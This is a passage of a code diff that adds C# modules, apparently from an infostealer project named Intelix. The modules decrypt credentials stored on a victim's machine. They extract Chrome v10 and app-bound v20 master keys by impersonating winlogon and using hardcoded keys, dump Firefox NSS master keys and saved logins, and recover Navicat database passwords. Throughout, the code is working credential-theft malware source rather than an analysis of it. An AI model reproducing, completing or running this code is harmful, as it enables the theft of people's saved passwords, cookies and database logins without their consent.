+ array[11] &= 15; + array[15] &= 15; + array[4] &= 252; + array[8] &= 252; + array[12] &= 252; + byte[] array2 = new byte[16]; + Buffer.BlockCopy(oneTimeKey32, 16, array2, 0, 16); + BigInteger bigInteger = new BigInteger(AppendZero(array)); + BigInteger bigInteger2 = new BigInteger(AppendZero(array2)); + BigInteger bigInteger3 = (BigInteger.One << 130) - 5; + BigInteger bigInteger4 = BigInteger.Zero; + for (int i = 0; i < msg.Length; i += 16) + { + int num = Math.Min(16, msg.Length - i); + byte[] array3 = new byte[num]; + Buffer.BlockCopy(msg, i, array3, 0, num); + BigInteger bigInteger5 = new BigInteger(AppendZero(array3)); + BigInteger bigInteger6 = BigInteger.One << 8 * num; + bigInteger5 += bigInteger6; + bigInteger4 += bigInteger5; + bigInteger4 = bigInteger4 * bigInteger % bigInteger3; + } + byte[] array4 = (bigInteger4 + bigInteger2).ToByteArray(); + byte[] array5 = new byte[16]; + for (int j = 0; j < 16 && j < array4.Length; j++) + { + array5[j] = array4[j]; + } + return array5; + } + + private static byte[] AppendZero(byte[] b) + { + byte[] array = new byte[b.Length + 1]; + Buffer.BlockCopy(b, 0, array, 0, b.Length); + array[array.Length - 1] = 0; + return array; + } + + private static bool FixedTimeEquals(byte[] a, byte[] b) + { + if (a == null || b == null || a.Length != b.Length) + { + return false; + } + int num = 0; + for (int i = 0; i < a.Length; i++) + { + num |= a[i] ^ b[i]; + } + return num == 0; + } +} diff --git a/New/Intelix.Helper.Encrypted/CngDecryptor.cs b/New/Intelix.Helper.Encrypted/CngDecryptor.cs new file mode 100644 index 0000000..8b1ffaa --- /dev/null +++ b/New/Intelix.Helper.Encrypted/CngDecryptor.cs @@ -0,0 +1,51 @@ +using System; + +namespace Intelix.Helper.Encrypted; + +public static class CngDecryptor +{ + private const int NCRYPT_SILENT_FLAG = 64; + + public static byte[] Decrypt(byte[] inputData, string providerName = "Microsoft Software Key Storage Provider", string keyName = "Google Chromekey1") + { + IntPtr phProvider = IntPtr.Zero; + IntPtr phKey = IntPtr.Zero; + try + { + int num = NativeMethods.NCryptOpenStorageProvider(out phProvider, providerName, 0); + if (num != 0) + { + throw new Exception($"Ошибка NCryptOpenStorageProvider: Код {num}"); + } + num = NativeMethods.NCryptOpenKey(phProvider, out phKey, keyName, 0, 0); + if (num != 0) + { + throw new Exception($"Ошибка NCryptOpenKey: Код {num}"); + } + num = NativeMethods.NCryptDecrypt(phKey, inputData, inputData.Length, IntPtr.Zero, null, 0, out var pcbResult, 64); + if (num != 0) + { + throw new Exception($"Ошибка определения размера NCryptDecrypt: Код {num}"); + } + byte[] array = new byte[pcbResult]; + num = NativeMethods.NCryptDecrypt(phKey, inputData, inputData.Length, IntPtr.Zero, array, array.Length, out pcbResult, 64); + if (num != 0) + { + throw new Exception($"Ошибка NCryptDecrypt: Код {num}"); + } + Array.Resize(ref array, pcbResult); + return array; + } + finally + { + if (phKey != IntPtr.Zero) + { + NativeMethods.NCryptFreeObject(phKey); + } + if (phProvider != IntPtr.Zero) + { + NativeMethods.NCryptFreeObject(phProvider); + } + } + } +} diff --git a/New/Intelix.Helper.Encrypted/DpApi.cs b/New/Intelix.Helper.Encrypted/DpApi.cs new file mode 100644 index 0000000..0b4b92d --- /dev/null +++ b/New/Intelix.Helper.Encrypted/DpApi.cs @@ -0,0 +1,48 @@ +using System; +using System.Runtime.InteropServices; + +namespace Intelix.Helper.Encrypted; + +public static class DpApi +{ + private static NativeMethods.CryptprotectPromptstruct Prompt = new NativeMethods.CryptprotectPromptstruct + { + cbSize = Marshal.SizeOf(typeof(NativeMethods.CryptprotectPromptstruct)), + dwPromptFlags = 0, + hwndApp = IntPtr.Zero, + szPrompt = null + }; + + public static byte[] Decrypt(byte[] bCipher) + { + NativeMethods.DataBlob pDataIn = default(NativeMethods.DataBlob); + NativeMethods.DataBlob pDataOut = default(NativeMethods.DataBlob); + NativeMethods.DataBlob pOptionalEntropy = default(NativeMethods.DataBlob); + string ppszDataDescr = string.Empty; + GCHandle gCHandle = GCHandle.Alloc(bCipher, GCHandleType.Pinned); + pDataIn.cbData = bCipher.Length; + pDataIn.pbData = gCHandle.AddrOfPinnedObject(); + try + { + if (!NativeMethods.CryptUnprotectData(ref pDataIn, ref ppszDataDescr, ref pOptionalEntropy, IntPtr.Zero, ref Prompt, 0, ref pDataOut) || pDataOut.cbData == 0) + { + return null; + } + byte[] array = new byte[pDataOut.cbData]; + Marshal.Copy(pDataOut.pbData, array, 0, pDataOut.cbData); + return array; + } + finally + { + gCHandle.Free(); + if (pDataOut.pbData != IntPtr.Zero) + { + Marshal.FreeHGlobal(pDataOut.pbData); + } + if (pOptionalEntropy.pbData != IntPtr.Zero) + { + Marshal.FreeHGlobal(pOptionalEntropy.pbData); + } + } + } +} diff --git a/New/Intelix.Helper.Encrypted/LocalEncryptor.cs b/New/Intelix.Helper.Encrypted/LocalEncryptor.cs new file mode 100644 index 0000000..697e49a --- /dev/null +++ b/New/Intelix.Helper.Encrypted/LocalEncryptor.cs @@ -0,0 +1,68 @@ +using System; +using System.Text; +using Intelix.Helper.Sql; + +namespace Intelix.Helper.Encrypted; + +public static class LocalEncryptor +{ + public static byte[] ExtractEncryptionKey(SqLite sql, byte[] encryptionKey) + { + byte[] array = new byte[0]; + if (sql.ReadTable("meta")) + { + for (int i = 0; i < sql.GetRowCount(); i++) + { + if (sql.GetValue(i, 0).Equals("local_encryptor_data")) + { + array = Encoding.Default.GetBytes(sql.GetValue(i, 1)); + break; + } + } + } + int num = FindByteSequence(array, Encoding.ASCII.GetBytes("v10")); + if (num == -1) + { + return null; + } + byte[] array2 = new byte[96]; + Array.Copy(array, num + 3, array2, 0, 96); + byte[] array3 = new byte[12]; + Array.Copy(array2, 0, array3, 0, 12); + int num2 = array2.Length - 12 - 16; + byte[] array4 = new byte[num2]; + Array.Copy(array2, 12, array4, 0, num2); + byte[] array5 = new byte[16]; + Array.Copy(array2, array2.Length - 16, array5, 0, 16); + byte[] array6 = AesGcm256.Decrypt(encryptionKey, array3, null, array4, array5); + if (BitConverter.ToInt32(array6, 0) == 538050824) + { + byte[] array7 = new byte[32]; + Array.Copy(array6, 4, array7, 0, 32); + return array7; + } + return null; + } + + private static int FindByteSequence(byte[] src, byte[] pattern) + { + int num = src.Length - pattern.Length + 1; + for (int i = 0; i < num; i++) + { + if (src[i] != pattern[0]) + { + continue; + } + int num2 = pattern.Length - 1; + while (num2 >= 1 && src[i + num2] == pattern[num2]) + { + if (num2 == 1) + { + return i; + } + num2--; + } + } + return -1; + } +} diff --git a/New/Intelix.Helper.Encrypted/LocalState.cs b/New/Intelix.Helper.Encrypted/LocalState.cs new file mode 100644 index 0000000..4e37908 --- /dev/null +++ b/New/Intelix.Helper.Encrypted/LocalState.cs @@ -0,0 +1,226 @@ +using System; +using System.Collections.Concurrent; +using System.Collections.Generic; +using System.IO; +using System.Linq; +using System.Text; +using System.Text.RegularExpressions; +using System.Threading; + +namespace Intelix.Helper.Encrypted; + +public static class LocalState +{ + private static readonly ConcurrentDictionary> _masterKeyCacheV10 = new ConcurrentDictionary>(); + + private static readonly ConcurrentDictionary> _masterKeyCacheV20 = new ConcurrentDictionary>(); + + private static readonly ConcurrentDictionary _locks = new ConcurrentDictionary(); + + public static List GetMasterKeys() + { + List list = new List(); + foreach (KeyValuePair> item in _masterKeyCacheV10) + { + try + { + string text = item.Key ?? ""; + Lazy value = item.Value; + if (value == null) + { + continue; + } + byte[] value2 = value.Value; + if (value2 != null) + { + StringBuilder stringBuilder = new StringBuilder(value2.Length * 2); + byte[] array = value2; + foreach (byte b in array) + { + stringBuilder.Append(b.ToString("X2")); + } + list.Add(new string[3] + { + text, + "v10", + stringBuilder.ToString() + }); + } + } + catch + { + } + } + foreach (KeyValuePair> item2 in _masterKeyCacheV20) + { + try + { + string text2 = item2.Key ?? ""; + Lazy value3 = item2.Value; + if (value3 == null) + { + continue; + } + byte[] value4 = value3.Value; + if (value4 != null) + { + StringBuilder stringBuilder2 = new StringBuilder(value4.Length * 2); + byte[] array = value4; + foreach (byte b2 in array) + { + stringBuilder2.Append(b2.ToString("X2")); + } + list.Add(new string[3] + { + text2, + "v20", + stringBuilder2.ToString() + }); + } + } + catch + { + } + } + return list; + } + + public static byte[] MasterKeyV20(string localstate) + { + SemaphoreSlim orAdd = _locks.GetOrAdd(localstate, (string _) => new SemaphoreSlim(1, 1)); + orAdd.Wait(); + try + { + if (_masterKeyCacheV20.TryGetValue(localstate, out var value)) + { + return value.Value; + } + Lazy lazy = new Lazy(() => ComputeMasterKeyV20(localstate)); + _masterKeyCacheV20[localstate] = lazy; + return lazy.Value; + } + finally + { + orAdd.Release(); + } + } + + private static byte[] ComputeMasterKeyV20(string localstate) + { + try + { + Match match = Regex.Match(LocalStateContent(localstate), "\"app_bound_encrypted_key\"\\s*:\\s*\"([^\"]+)\""); + if (!match.Success) + { + return null; + } + BlobParsedData blobParsedData = ParseKeyBlob.Parse(DecryptAsSystemUser(Convert.FromBase64String(match.Groups[1].Value).Skip(4).ToArray())); + switch (blobParsedData.Flag) + { + case 1: + return AesGcm256.Decrypt(new byte[32] + { + 179, 28, 110, 36, 26, 200, 70, 114, 141, 169, + 193, 250, 196, 147, 102, 81, 207, 251, 148, 77, + 20, 58, 184, 22, 39, 107, 204, 109, 160, 40, + 71, 135 + }, blobParsedData.Iv, null, blobParsedData.Ciphertext, blobParsedData.Tag); + case 2: + return ChaCha20Poly1305.Decrypt(new byte[32] + { + 233, 143, 55, 215, 244, 225, 250, 67, 61, 25, + 48, 77, 194, 37, 128, 66, 9, 14, 45, 29, + 126, 234, 118, 112, 212, 31, 115, 141, 8, 114, + 150, 96 + }, blobParsedData.Iv, blobParsedData.Ciphertext, blobParsedData.Tag); + case 3: + { + byte[] array = new byte[32] + { + 204, 248, 161, 206, 197, 102, 5, 184, 81, 117, + 82, 186, 26, 45, 6, 28, 3, 162, 158, 144, + 39, 79, 178, 252, 245, 155, 164, 183, 92, 57, + 35, 144 + }; + byte[] array2 = CDecryptor(blobParsedData.EncryptedAesKey); + for (int i = 0; i < array2.Length; i++) + { + array2[i] ^= array[i]; + } + return AesGcm256.Decrypt(array2, blobParsedData.Iv, null, blobParsedData.Ciphertext, blobParsedData.Tag); + } + case 32: + return blobParsedData.EncryptedAesKey; + default: + return null; + } + } + catch + { + return null; + } + } + + public static byte[] MasterKeyV10(string localstate) + { + SemaphoreSlim orAdd = _locks.GetOrAdd(localstate, (string _) => new SemaphoreSlim(1, 1)); + orAdd.Wait(); + try + { + if (_masterKeyCacheV10.TryGetValue(localstate, out var value)) + { + return value.Value; + } + Lazy lazy = new Lazy(() => ComputeMasterKeyV10(localstate)); + _masterKeyCacheV10[localstate] = lazy; + return lazy.Value; + } + finally + { + orAdd.Release(); + } + } + + private static byte[] ComputeMasterKeyV10(string localstate) + { + try + { + Match match = Regex.Match(LocalStateContent(localstate), "\"encrypted_key\":\"(.*?)\""); + if (!match.Success) + { + return null; + } + return DpApi.Decrypt(Convert.FromBase64String(match.Groups[1].Value).Skip(5).ToArray()); + } + catch + { + return null; + } + } + + private static byte[] CDecryptor(byte[] encryptedData) + { + using (ImpersonationHelper.ImpersonateWinlogon()) + { + return CngDecryptor.Decrypt(encryptedData); + } + } + + private static byte[] DecryptAsSystemUser(byte[] encryptedData) + { + using (ImpersonationHelper.ImpersonateWinlogon()) + { + encryptedData = DpApi.Decrypt(encryptedData); + } + return DpApi.Decrypt(encryptedData); + } + + private static string LocalStateContent(string localstate) + { + string text = Path.Combine(Path.GetTempPath(), Path.GetRandomFileName()); + File.Copy(localstate, text, overwrite: true); + string result = File.ReadAllText(text); + File.Delete(text); + return result; + } +} diff --git a/New/Intelix.Helper.Encrypted/NSSDecryptor.cs b/New/Intelix.Helper.Encrypted/NSSDecryptor.cs new file mode 100644 index 0000000..a572756 --- /dev/null +++ b/New/Intelix.Helper.Encrypted/NSSDecryptor.cs @@ -0,0 +1,80 @@ +using System; +using System.IO; +using System.Runtime.InteropServices; +using System.Text; + +namespace Intelix.Helper.Encrypted; + +public static class NSSDecryptor +{ + public struct SECItem + { + public int Type; + + public IntPtr Data; + + public int Len; + } + + [DllImport("nss3.dll", CallingConvention = CallingConvention.Cdecl)] + private static extern int NSS_Init(string configdir); + + [DllImport("nss3.dll", CallingConvention = CallingConvention.Cdecl)] + private static extern int NSS_Shutdown(); + + [DllImport("nss3.dll", CallingConvention = CallingConvention.Cdecl)] + private static extern int PK11SDR_Decrypt(ref SECItem data, ref SECItem result, int cx); + + public static bool Initialize(string profilePath) + { + try + { + string text = "C:\\Program Files\\Mozilla Firefox"; + if (!Directory.Exists(text)) + { + return false; + } + string environmentVariable = Environment.GetEnvironmentVariable("PATH"); + environmentVariable = environmentVariable + ";" + text; + Environment.SetEnvironmentVariable("PATH", environmentVariable); + return NSS_Init(profilePath) == 0; + } + catch + { + return false; + } + } + + public static string Decrypt(string base64) + { + try + { + byte[] array = Convert.FromBase64String(base64); + if (array.Length == 0) + { + return null; + } + SECItem data = new SECItem + { + Data = Marshal.AllocHGlobal(array.Length), + Len = array.Length, + Type = 0 + }; + Marshal.Copy(array, 0, data.Data, array.Length); + SECItem result = default(SECItem); + int num = PK11SDR_Decrypt(ref data, ref result, 0); + Marshal.FreeHGlobal(data.Data); + if (num != 0 || result.Data == IntPtr.Zero) + { + return null; + } + byte[] array2 = new byte[result.Len]; + Marshal.Copy(result.Data, array2, 0, result.Len); + return Encoding.UTF8.GetString(array2); + } + catch + { + return null; + } + } +} diff --git a/New/Intelix.Helper.Encrypted/Navicat11Cipher.cs b/New/Intelix.Helper.Encrypted/Navicat11Cipher.cs new file mode 100644 index 0000000..2dca7fa --- /dev/null +++ b/New/Intelix.Helper.Encrypted/Navicat11Cipher.cs @@ -0,0 +1,64 @@ +using System; +using System.Linq; +using System.Security.Cryptography; +using System.Text; + +namespace Intelix.Helper.Encrypted; + +public class Navicat11Cipher +{ + private Blowfish blowfishCipher; + + protected byte[] StringToByteArray(string hex) + { + return (from x in Enumerable.Range(0, hex.Length) + where x % 2 == 0 + select Convert.ToByte(hex.Substring(x, 2), 16)).ToArray(); + } + + protected void XorBytes(byte[] a, byte[] b, int len) + { + for (int i = 0; i < len; i++) + { + a[i] ^= b[i]; + } + } + + public Navicat11Cipher() + { + byte[] array = new byte[8] { 51, 68, 67, 53, 67, 65, 51, 57 }; + using SHA1CryptoServiceProvider sHA1CryptoServiceProvider = new SHA1CryptoServiceProvider(); + sHA1CryptoServiceProvider.TransformFinalBlock(array, 0, array.Length); + blowfishCipher = new Blowfish(sHA1CryptoServiceProvider.Hash); + } + + public string DecryptString(string ciphertext) + { + byte[] array = StringToByteArray(ciphertext); + byte[] array2 = Enumerable.Repeat(byte.MaxValue, blowfishCipher.BlockSize).ToArray(); + blowfishCipher.Encrypt(array2, Blowfish.Endian.Big); + byte[] array3 = new byte[0]; + int num = array.Length / blowfishCipher.BlockSize; + int num2 = array.Length % blowfishCipher.BlockSize; + byte[] array4 = new byte[blowfishCipher.BlockSize]; + byte[] array5 = new byte[blowfishCipher.BlockSize]; + for (int i = 0; i < num; i++) + { + Array.Copy(array, blowfishCipher.BlockSize * i, array4, 0, blowfishCipher.BlockSize); + Array.Copy(array4, array5, blowfishCipher.BlockSize); + blowfishCipher.Decrypt(array4, Blowfish.Endian.Big); + XorBytes(array4, array2, blowfishCipher.BlockSize); + array3 = array3.Concat(array4).ToArray(); + XorBytes(array2, array5, blowfishCipher.BlockSize); + } + if (num2 != 0) + { + Array.Clear(array4, 0, array4.Length); + Array.Copy(array, blowfishCipher.BlockSize * num, array4, 0, num2); + blowfishCipher.Encrypt(array2, Blowfish.Endian.Big); + XorBytes(array4, array2, blowfishCipher.BlockSize); + array3 = array3.Concat(array4.Take(num2).ToArray()).ToArray(); + } + return Encoding.UTF8.GetString(array3); + } +} diff --git a/New/Intelix.Helper.Encrypted/NssDumpMasterKey.cs b/New/Intelix.Helper.Encrypted/NssDumpMasterKey.cs new file mode 100644 index 0000000..50c3714 --- /dev/null +++ b/New/Intelix.Helper.Encrypted/NssDumpMasterKey.cs @@ -0,0 +1,178 @@ +using System; +using System.Collections.Generic; +using System.Globalization; +using System.IO; +using System.Linq; +using System.Text; +using Intelix.Helper.Hashing; +using Intelix.Helper.Sql; + +namespace Intelix.Helper.Encrypted; + +public static class NssDumpMasterKey +{ + public static byte[] Key4Database(string path) + { + Asn1Der asn1Der = new Asn1Der(); + SqLite sqLite = SqLite.ReadTable(path, "metaData"); + if (sqLite == null) + { + return null; + } + for (int i = 0; i < sqLite.GetRowCount(); i++) + { + if (sqLite.GetValue(i, 0) != "password") + { + continue; + } + byte[] bytes = Encoding.UTF8.GetBytes(sqLite.GetValue(i, 1)); + byte[] bytes2 = Encoding.UTF8.GetBytes(sqLite.GetValue(i, 2)); + if (bytes.Length < 1 || bytes2.Length < 1) + { + continue; + } + Asn1DerObject asn1DerObject = asn1Der.Parse(bytes2); + string text = asn1DerObject.ToString(); + if (text == null) + { + continue; + } + if (text.Contains("2A864886F70D010C050103")) + { + byte[] array = asn1DerObject.Objects[0]?.Objects[0]?.Objects[1]?.Objects[0]?.Data; + byte[] array2 = asn1DerObject.Objects[0]?.Objects[1]?.Data; + if (array == null || array2 == null) + { + continue; + } + byte[] bytes3 = new TripleDes(array2, bytes, new byte[0], array).Compute(); + if (!Encoding.GetEncoding("ISO-8859-1").GetString(bytes3).StartsWith("password-check")) + { + continue; + } + } + else + { + if (!text.Contains("2A864886F70D01050D")) + { + continue; + } + byte[] array3 = asn1DerObject.Objects[0]?.Objects[0]?.Objects[1]?.Objects[0]?.Objects[1]?.Objects[0]?.Data; + byte[] array4 = asn1DerObject.Objects[0]?.Objects[0]?.Objects[1]?.Objects[2]?.Objects[1]?.Data; + byte[] array5 = asn1DerObject.Objects[0]?.Objects[0]?.Objects[1]?.Objects[3]?.Data; + if (array3 == null || array4 == null || array5 == null) + { + continue; + } + byte[] bytes4 = new PBE(array5, bytes, new byte[0], array3, array4).Compute(); + if (!Encoding.GetEncoding("ISO-8859-1").GetString(bytes4).StartsWith("password-check")) + { + continue; + } + } + sqLite = SqLite.ReadTable(path, "nssPrivate"); + if (sqLite != null) + { + int num = 0; + if (num < sqLite.GetRowCount()) + { + byte[] bytes5 = Encoding.UTF8.GetBytes(sqLite.GetValue(num, 6)); + Asn1DerObject asn1DerObject2 = asn1Der.Parse(bytes5); + byte[] sourceArray = new PBE(entrySalt: asn1DerObject2.Objects[0].Objects[0].Objects[1].Objects[0].Objects[1].Objects[0].Data, partIv: asn1DerObject2.Objects[0].Objects[0].Objects[1].Objects[2].Objects[1].Data, ciphertext: asn1DerObject2.Objects[0].Objects[0].Objects[1].Objects[3].Data, globalSalt: bytes, masterPassword: new byte[0]).Compute(); + byte[] array6 = new byte[24]; + Array.Copy(sourceArray, array6, array6.Length); + return array6; + } + } + } + return null; + } + + public static byte[] Key3Database(string path) + { + byte[] array = File.ReadAllBytes(path); + if (array == null) + { + return null; + } + Asn1Der asn1Der = new Asn1Der(); + BerkeleyDB berkeleyDB = new BerkeleyDB(array); + string text = berkeleyDB.Keys.Where(delegate(KeyValuePair p) + { + KeyValuePair keyValuePair = p; + return keyValuePair.Key.Equals("password-check"); + }).Select(delegate(KeyValuePair p) + { + KeyValuePair keyValuePair = p; + return keyValuePair.Value; + }).FirstOrDefault(); + if (text == null) + { + return null; + } + text = text.Replace("-", null); + int num = int.Parse(text.Substring(2, 2), NumberStyles.HexNumber) * 2; + string hexString = text.Substring(6, num); + int num2 = text.Length - (6 + num + 36); + string hexString2 = text.Substring(6 + num + 4 + num2); + string text2 = berkeleyDB.Keys.Where(delegate(KeyValuePair p) + { + KeyValuePair keyValuePair = p; + return keyValuePair.Key.Equals("global-salt"); + }).Select(delegate(KeyValuePair p) + { + KeyValuePair keyValuePair = p; + return keyValuePair.Value; + }).FirstOrDefault(); + if (text2 == null) + { + return null; + } + text2 = text2.Replace("-", null); + TripleDes tripleDes = new TripleDes(HexToBytes(text2), Encoding.ASCII.GetBytes(""), HexToBytes(hexString)); + tripleDes.ComputeVoid(); + if (!TripleDes.DecryptStringDesCbc(tripleDes.Key, tripleDes.Vector, HexToBytes(hexString2)).StartsWith("password-check")) + { + return null; + } + string text3 = (from p in berkeleyDB.Keys + where !p.Key.Equals("global-salt") && !p.Key.Equals("Version") && !p.Key.Equals("password-check") + select p.Value).FirstOrDefault(); + if (text3 == null) + { + return null; + } + text3 = text3.Replace("-", ""); + Asn1DerObject asn1DerObject = asn1Der.Parse(HexToBytes(text3)); + TripleDes tripleDes2 = new TripleDes(HexToBytes(text2), Encoding.ASCII.GetBytes(""), asn1DerObject.Objects[0].Objects[0].Objects[1].Objects[0].Data); + tripleDes2.ComputeVoid(); + byte[] toParse = TripleDes.DecryptByteDesCbc(tripleDes2.Key, tripleDes2.Vector, asn1DerObject.Objects[0].Objects[1].Data); + Asn1DerObject asn1DerObject2 = asn1Der.Parse(toParse); + Asn1DerObject asn1DerObject3 = asn1Der.Parse(asn1DerObject2.Objects[0].Objects[2].Data); + byte[] array2 = new byte[24]; + if (asn1DerObject3.Objects[0].Objects[3].Data.Length > 24) + { + Array.Copy(asn1DerObject3.Objects[0].Objects[3].Data, asn1DerObject3.Objects[0].Objects[3].Data.Length - 24, array2, 0, 24); + } + else + { + array2 = asn1DerObject3.Objects[0].Objects[3].Data; + } + return array2; + } + + public static byte[] HexToBytes(string hexString) + { + if (hexString.Length % 2 != 0) + { + return null; + } + byte[] array = new byte[hexString.Length / 2]; + for (int i = 0; i < array.Length; i++) + { + string s = hexString.Substring(i * 2, 2); + array[i] = byte.Parse(s, NumberStyles.HexNumber, CultureInfo.InvariantCulture); + } + return array; + } +} diff --git a/New/Intelix.Helper.Encrypted/RC4Crypt.cs b/New/Intelix.Helper.Encrypted/RC4Crypt.cs new file mode 100644 index 0000000..8a0ca7d --- /dev/null +++ b/New/Intelix.Helper.Encrypted/RC4Crypt.cs @@ -0,0 +1,50 @@ +namespace Intelix.Helper.Encrypted; + +public class RC4Crypt +{ + public static byte[] Decrypt(byte[] key, byte[] data) + { + if (key == null) + { + return null; + } + if (key.Length == 0) + { + return null; + } + if (data == null) + { + return null; + } + byte[] array = new byte[256]; + for (int i = 0; i < 256; i++) + { + array[i] = (byte)i; + } + int num = 0; + for (int j = 0; j < 256; j++) + { + num = (num + array[j] + key[j % key.Length]) & 0xFF; + Swap(array, j, num); + } + byte[] array2 = new byte[data.Length]; + int num2 = 0; + num = 0; + for (int k = 0; k < data.Length; k++) + { + num2 = (num2 + 1) & 0xFF; + num = (num + array[num2]) & 0xFF; + Swap(array, num2, num); + byte b = array[(array[num2] + array[num]) & 0xFF]; + array2[k] = (byte)(data[k] ^ b); + } + return array2; + } + + private static void Swap(byte[] arr, int a, int b) + { + byte b2 = arr[a]; + arr[a] = arr[b]; + arr[b] = b2; + } +} diff --git a/New/Intelix.Helper.Encrypted/TripleDes.cs b/New/Intelix.Helper.Encrypted/TripleDes.cs new file mode 100644 index 0000000..90cf357 --- /dev/null +++ b/New/Intelix.Helper.Encrypted/TripleDes.cs @@ -0,0 +1,163 @@ +using System; +using System.IO; +using System.Security.Cryptography; + +namespace Intelix.Helper.Encrypted; + +internal class TripleDes +{ + private byte[] CipherText { get; } + + private byte[] GlobalSalt { get; } + + private byte[] MasterPassword { get; } + + private byte[] EntrySalt { get; } + + public byte[] Key { get; private set; } + + public byte[] Vector { get; private set; } + + public TripleDes(byte[] cipherText, byte[] globalSalt, byte[] masterPass, byte[] entrySalt) + { + CipherText = cipherText; + GlobalSalt = globalSalt; + MasterPassword = masterPass; + EntrySalt = entrySalt; + } + + public TripleDes(byte[] globalSalt, byte[] masterPassword, byte[] entrySalt) + { + GlobalSalt = globalSalt; + MasterPassword = masterPassword; + EntrySalt = entrySalt; + } + + public void ComputeVoid() + { + SHA1CryptoServiceProvider sHA1CryptoServiceProvider = new SHA1CryptoServiceProvider(); + byte[] array = new byte[GlobalSalt.Length + MasterPassword.Length]; + Array.Copy(GlobalSalt, 0, array, 0, GlobalSalt.Length); + Array.Copy(MasterPassword, 0, array, GlobalSalt.Length, MasterPassword.Length); + byte[] array2 = sHA1CryptoServiceProvider.ComputeHash(array); + byte[] array3 = new byte[array2.Length + EntrySalt.Length]; + Array.Copy(array2, 0, array3, 0, array2.Length); + Array.Copy(EntrySalt, 0, array3, array2.Length, EntrySalt.Length); + byte[] key = sHA1CryptoServiceProvider.ComputeHash(array3); + byte[] array4 = new byte[20]; + Array.Copy(EntrySalt, 0, array4, 0, EntrySalt.Length); + for (int i = EntrySalt.Length; i < 20; i++) + { + array4[i] = 0; + } + byte[] array5 = new byte[array4.Length + EntrySalt.Length]; + Array.Copy(array4, 0, array5, 0, array4.Length); + Array.Copy(EntrySalt, 0, array5, array4.Length, EntrySalt.Length); + byte[] array6; + byte[] array9; + using (HMACSHA1 hMACSHA = new HMACSHA1(key)) + { + array6 = hMACSHA.ComputeHash(array5); + byte[] array7 = hMACSHA.ComputeHash(array4); + byte[] array8 = new byte[array7.Length + EntrySalt.Length]; + Array.Copy(array7, 0, array8, 0, array7.Length); + Array.Copy(EntrySalt, 0, array8, array7.Length, EntrySalt.Length); + array9 = hMACSHA.ComputeHash(array8); + } + byte[] array10 = new byte[array6.Length + array9.Length]; + Array.Copy(array6, 0, array10, 0, array6.Length); + Array.Copy(array9, 0, array10, array6.Length, array9.Length); + Key = new byte[24]; + for (int j = 0; j < Key.Length; j++) + { + Key[j] = array10[j]; + } + Vector = new byte[8]; + int num = Vector.Length - 1; + for (int num2 = array10.Length - 1; num2 >= array10.Length - Vector.Length; num2--) + { + Vector[num] = array10[num2]; + num--; + } + } + + public byte[] Compute() + { + byte[] array = new byte[GlobalSalt.Length + MasterPassword.Length]; + Buffer.BlockCopy(GlobalSalt, 0, array, 0, GlobalSalt.Length); + Buffer.BlockCopy(MasterPassword, 0, array, GlobalSalt.Length, MasterPassword.Length); + byte[] array2 = new SHA1Managed().ComputeHash(array); + byte[] array3 = new byte[array2.Length + EntrySalt.Length]; + Buffer.BlockCopy(array2, 0, array3, 0, array2.Length); + Buffer.BlockCopy(EntrySalt, 0, array3, EntrySalt.Length, array2.Length); + byte[] key = new SHA1Managed().ComputeHash(array3); + byte[] array4 = new byte[20]; + Array.Copy(EntrySalt, 0, array4, 0, EntrySalt.Length); + for (int i = EntrySalt.Length; i < 20; i++) + { + array4[i] = 0; + } + byte[] array5 = new byte[array4.Length + EntrySalt.Length]; + Array.Copy(array4, 0, array5, 0, array4.Length); + Array.Copy(EntrySalt, 0, array5, array4.Length, EntrySalt.Length); + byte[] array6; + byte[] array9; + using (HMACSHA1 hMACSHA = new HMACSHA1(key)) + { + array6 = hMACSHA.ComputeHash(array5); + byte[] array7 = hMACSHA.ComputeHash(array4); + byte[] array8 = new byte[array7.Length + EntrySalt.Length]; + Buffer.BlockCopy(array7, 0, array8, 0, array7.Length); + Buffer.BlockCopy(EntrySalt, 0, array8, array7.Length, EntrySalt.Length); + array9 = hMACSHA.ComputeHash(array8); + } + byte[] array10 = new byte[array6.Length + array9.Length]; + Array.Copy(array6, 0, array10, 0, array6.Length); + Array.Copy(array9, 0, array10, array6.Length, array9.Length); + Key = new byte[24]; + for (int j = 0; j < Key.Length; j++) + { + Key[j] = array10[j]; + } + Vector = new byte[8]; + int num = Vector.Length - 1; + for (int num2 = array10.Length - 1; num2 >= array10.Length - Vector.Length; num2--) + { + Vector[num] = array10[num2]; + num--; + } + byte[] sourceArray = DecryptByteDesCbc(Key, Vector, CipherText); + byte[] array11 = new byte[24]; + Array.Copy(sourceArray, array11, array11.Length); + return array11; + } + + public static string DecryptStringDesCbc(byte[] key, byte[] iv, byte[] input) + { + using TripleDESCryptoServiceProvider tripleDESCryptoServiceProvider = new TripleDESCryptoServiceProvider(); + tripleDESCryptoServiceProvider.Key = key; + tripleDESCryptoServiceProvider.IV = iv; + tripleDESCryptoServiceProvider.Mode = CipherMode.CBC; + tripleDESCryptoServiceProvider.Padding = PaddingMode.None; + ICryptoTransform transform = tripleDESCryptoServiceProvider.CreateDecryptor(tripleDESCryptoServiceProvider.Key, tripleDESCryptoServiceProvider.IV); + using MemoryStream stream = new MemoryStream(input); + using CryptoStream stream2 = new CryptoStream(stream, transform, CryptoStreamMode.Read); + using StreamReader streamReader = new StreamReader(stream2); + return streamReader.ReadToEnd(); + } + + public static byte[] DecryptByteDesCbc(byte[] key, byte[] iv, byte[] input) + { + byte[] array = new byte[512]; + using TripleDESCryptoServiceProvider tripleDESCryptoServiceProvider = new TripleDESCryptoServiceProvider(); + tripleDESCryptoServiceProvider.Key = key; + tripleDESCryptoServiceProvider.IV = iv; + tripleDESCryptoServiceProvider.Mode = CipherMode.CBC; + tripleDESCryptoServiceProvider.Padding = PaddingMode.None; + ICryptoTransform transform = tripleDESCryptoServiceProvider.CreateDecryptor(tripleDESCryptoServiceProvider.Key, tripleDESCryptoServiceProvider.IV); + using MemoryStream stream = new MemoryStream(input); + using CryptoStream cryptoStream = new CryptoStream(stream, transform, CryptoStreamMode.Read); + cryptoStream.Read(array, 0, array.Length); + return array; + } +} diff --git a/New/Intelix.Helper.Encrypted/Xor.cs b/New/Intelix.Helper.Encrypted/Xor.cs new file mode 100644 index 0000000..0f0b2db --- /dev/null +++ b/New/Intelix.Helper.Encrypted/Xor.cs @@ -0,0 +1,16 @@ +using System.Text; + +namespace Intelix.Helper.Encrypted; + +public static class Xor +{ + public static string DecryptString(string input, byte key) + { + byte[] bytes = Encoding.UTF8.GetBytes(input); + for (int i = 0; i < bytes.Length; i++) + { + bytes[i] ^= key; + } + return Encoding.UTF8.GetString(bytes); + } +} diff --git 